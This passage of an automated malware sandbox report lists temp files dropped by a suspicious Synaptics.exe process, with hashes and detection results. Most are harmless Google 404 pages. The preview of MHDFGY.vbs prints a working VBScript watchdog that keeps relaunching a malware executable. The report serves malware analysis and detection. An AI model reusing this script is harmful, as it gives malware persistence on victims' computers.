                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QNt5nbAtKs5WBEkAL0v17A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\MHDFGY.vbs

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\._cache_LWQDFZ.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):836
                                                                                                                    Entropy (8bit):5.359914217000316
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:dF/UFXOHU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFzt+G+7xLxe0WABNVIqZaVzgA
                                                                                                                    MD5:0F33CF0E06EA6172629A11C48A0B0944
                                                                                                                    SHA1:E87E8883A8E99AEFB45D3FFF7EB625C5C3EDA988
                                                                                                                    SHA-256:2ED8C8B807212F557F8431199DC44524D2DC9BF708516330396383C1D4C897CC
                                                                                                                    SHA-512:B1673ED2949738761C0EBAF6CD3D68344E5C88E594CA193B0CDF61FDF7DD0C0C142280A132A0E678FF525FFA5A5B4385595D01A1F5FCD6E431F03ADDEA161C4F
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_LWQDFZ.exe"..fileset = """C:\Users\user\Desktop\._cache_LWQDFZ.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                                                                                                                    C:\Users\user\AppData\Local\Temp\MiXWivl.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.2629620986565495
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+04NzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9+pAZewRDK4mW
                                                                                                                    MD5:41803DC9F3D36D157F48FC8B64452E33
                                                                                                                    SHA1:F83D4301A9B546F5109FDBF3CA6429CE96CE9A20
                                                                                                                    SHA-256:7DB96E9B4A8AE9AFC92E9E5034DE63047D6D5D4E3CCCA53FDC0EAF211B59DCED
                                                                                                                    SHA-512:C54FF8C2BA496501877671A6EFC2A2BC4513A8213CADD17D6F661DEBA1FD00F83451297AB3D5D8C09FC9CC7A767AF7638B14937FE54890D89DD617FF5A30BDB0
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LVDLh_hlyqC2thGJ0dOBvw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\N9DtJyw.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.263570425164924
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0OpzDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+N+pAZewRDK4mW
                                                                                                                    MD5:0B4E9C7BD1DB985BCE7AAFEF3C3D621A
                                                                                                                    SHA1:0F20E5F47ABFA2308312364E656ABA8C83C1B75C
                                                                                                                    SHA-256:0E8795D381E9BBB72D51846837B1E169E5CA69DE35B1DF022DAF0459911C202A
                                                                                                                    SHA-512:172A6B7C8D48D76D8F0449EDD3AB61C6E7C02F95DB75F35624E911A6838E8C812852555165F63880FDD0676936DE1AE0AC9971A66823030D91D3192ECD4E5382
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DWveTKvlnnVWuLQ434iV4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\P5AoVhL.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.279845415583851
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+08SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
                                                                                                                    MD5:AD462FE607A0A1C7E5F6D244051117E6
                                                                                                                    SHA1:5F08877F4ADEC5058E82E80CEFB906B9F9969E9A
                                                                                                                    SHA-256:5052B2F44B24451C08FBE4CB3FAE6982E32B42556277FBC02A76DAAE1B364CDF
                                                                                                                    SHA-512:57A236A633808E61356C718E8BED52AAFCE4C92030A84400AEFE8D417E7552766FD71D4EEDF7B4EFB3D9C7E2309C9DDF0A28F04924F493AA83E45BB5456EE8F7
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CfhPlWYlLqJLYBLIAARiQA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\PvgtFNh.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.2541770629430165
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0WRSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t+pAZewRDK4mW
                                                                                                                    MD5:B1DEDE25A1B71A3D647FF9222A0671CD
                                                                                                                    SHA1:5E1F8108302B1F51B34A32C091B42AC8E25FB30D
                                                                                                                    SHA-256:FF503D313D82A6A118DE8752021A1D7CB6FF31DF7F321FE1919D11EEDB3CD7BA
                                                                                                                    SHA-512:F920495BEC3CABE584E46407EF3A2A1398568C99A0CFC1946B1411047D6FD7A38D85083F13A42CCC934150E856C83E40F03D19FD1D5F8BFE7133571E641E566D
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="l3lnPoW6RCgS-oHe0IdxrQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\T3P6gW5.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.272066606686693
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                                    MD5:7FD9031073596093F157F84E63063BB7
                                                                                                                    SHA1:F1DD5BD5512CEA4A441D2B2E026C922A9B42ECF9
                                                                                                                    SHA-256:ADBCBAE3FBE08A2B4768EBA11938A284F94631E88F463DAC9AEF22A1A753934C
                                                                                                                    SHA-512:2982ACAE918828905DE48D13D167FA630B4B8FBB28526F764805CF78E5EDE53E32149680392D411931F614F3ECF94DE1DBCE39D17E6B9E0FA4CA8C2DF7419955
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DivYfd2uwVQnBDGXqRMSJg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\TLN42sZ.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.263538042301746
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0WSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9+pAZewRDK4mW
                                                                                                                    MD5:8E02FD779C9C27DC5F68B5DED0E897EC
                                                                                                                    SHA1:D12B514B3A1C70E878293197EF5435C3761DC05E
                                                                                                                    SHA-256:B921ECE6D1984E910E58316496DCF897687C0FB763D4B1B0EB8D37E0CBE219B3
                                                                                                                    SHA-512:DB2C38BC669563CA333ACB3FA6FCD11139A68CB3B8B3C57E1BFFF03B7DBD2375917CEB5AC31B13630C1587B694D0004D70D017DC85ADBAC55DFDC5A6E876BCE1
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2Z986GHTQ1qBxClimmvzmw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\TlnrVXz.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.260677429141939
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0ozbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Jzb+pAZewRDK4mW
                                                                                                                    MD5:40CDB0D0271BF6D6B0C61E931134455D
                                                                                                                    SHA1:0C2EFFDB11ED9EAE5D616F73482ADAC8D71D41E5
                                                                                                                    SHA-256:DE1B24E8EC24A6CDFF5FD4050BCEF881A4894A349C1D66BD55A85D98871E617E
                                                                                                                    SHA-512:8D2A193D147A52181A7378833DD34061F048D5EB636F8393934A22DB4A488FD757FD6A2EECEBF95F16680A0AE7BFD9C8D1925D2A88B2E37DDB5468BCD6B35ACD
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZlqbuqhV-czE66x8X_322w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\UDvWlj5.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.255887802298005
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0wl3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+95+pAZewRDK4mW
                                                                                                                    MD5:320EDA039B56579C2C1254BF78B219EC
                                                                                                                    SHA1:064D10F6E60D37F0AD35CD57F5A22311B972817D
                                                                                                                    SHA-256:0CDFC880B62DAD8D0385F4D35A89AC9A64AD7CA163F5E61CC4C0BA17B18B4FB6
                                                                                                                    SHA-512:A5FD51A10EB2C65D3BD22662CE98559D43854F14C0CD741DB7AC0AB3CB986EEDFF2C7D8ABAC25C160DC3DD38B06F1180A13BF6887E06921A7F6E75F4D693D725
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="j9dqMdXu1biGrlhKVsgEOg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\WAtyFMr.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.247594538160015
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0vISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+WI+pAZewRDK4mW
                                                                                                                    MD5:77E2E3180B695AB3C25FD0CAF3926B68
                                                                                                                    SHA1:85D82D825786F5B88263393A8894A7CC8C2FF2CE
                                                                                                                    SHA-256:D06112B4452F00085CEDF3EEAF116E076490A58EF6531BF064A567DF8B868010
                                                                                                                    SHA-512:B05FF311BC59800F43F25E4E7DADF3AE631F46E1CDB66B138CD665935EFFD20377C255F0E06477252B3B261212F908CC8D67FE92E64B430C7C36693E8773DCDB
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ye1HrDgyZicT55h1i_NdLg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\WIMvtvd.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.264429145083978
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0JXTgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c8+pAZewRDK4mW
                                                                                                                    MD5:CF08D9A796A5776A89A778330A636DFE
                                                                                                                    SHA1:324805642983DB67145E8444975D427AF3B97AA9
                                                                                                                    SHA-256:8E40D443F2C99D4F4DC1A1BC9FC13FEF21492A6321B261FF15C3E47EC0E4172D
                                                                                                                    SHA-512:B741F876DF9994A9E346332B217FEA0349987F19637B9AB45791F2600389D3350593FF87FEF21BE786951586176A9814BEC0F788FE76C47E2D421326EE8A2475
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="86pV44g544oQKCCJc8cPUw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\X2tcbLo.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.244594523882006
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0hQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+N+pAZewRDK4mW
                                                                                                                    MD5:6AAF43847898087536140BD52F424CE5
                                                                                                                    SHA1:7260EA4F814DAA79BCCC71F9E704091E9FEAEEAF
                                                                                                                    SHA-256:12142150EBBE53F55B3636C0D75873D02826C7B2D3934580EC22C5F23FCEE47C
                                                                                                                    SHA-512:1604CF9D2B4084D7DB4EAB99F3822AE1952ED7B0A43EBE4A393562FDEA52794EC2009D163299DDF35F48BAA5AB56069C7CCFD3E6C0CD98A91666618AC341DEDE
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tUww7GtbqSwLep3pirr8Og">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\X495RMg.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.266411530117205
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0jMWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+i+pAZewRDK4mW
                                                                                                                    MD5:C177F0108B6246F977CCEBA356C02E9A
                                                                                                                    SHA1:2CD0DECA135833D45BAC50179FE16B30DE0DAD8B
                                                                                                                    SHA-256:C880CBD26082774D9CBC71983FAC995E0DC040BD8A3B1A57AD55B139B01CC054
                                                                                                                    SHA-512:F4080F3879469B585FBA9F425501832BB1855C5C27FAA859792FF51327E2FF7202950CD64939ED0F9CDBEA125E32088DB4E32D6281772DB01AAE2F43806F0353
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="K8cYedfFoC6cq3yqLxBk9Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\XYay5H1.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.254565603229231
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+++pAZewRDK4mW
                                                                                                                    MD5:72555E7ACB511F9D96AAD3B124EDFB7D
                                                                                                                    SHA1:D3ADE64CD2BBD2F78DDE30E69EBF7A2C183990CA
                                                                                                                    SHA-256:09BAA7374314C6397CB0B9725F4E43A199E228523B41317D42FF2BC2FC5832B8
                                                                                                                    SHA-512:85FD8ACE849C309B1C5B4A1C56E19BB1809F41BEF29B52C76595155AF16B1BAD7BC3E3BA2A61BA62962161AC127E74D0E82B46B8959FECC37479A7B8E6682A24
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AcKN200mvmhFCZajnltZ8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\ZT8hC1s.ini

                                                                                                                    Download File
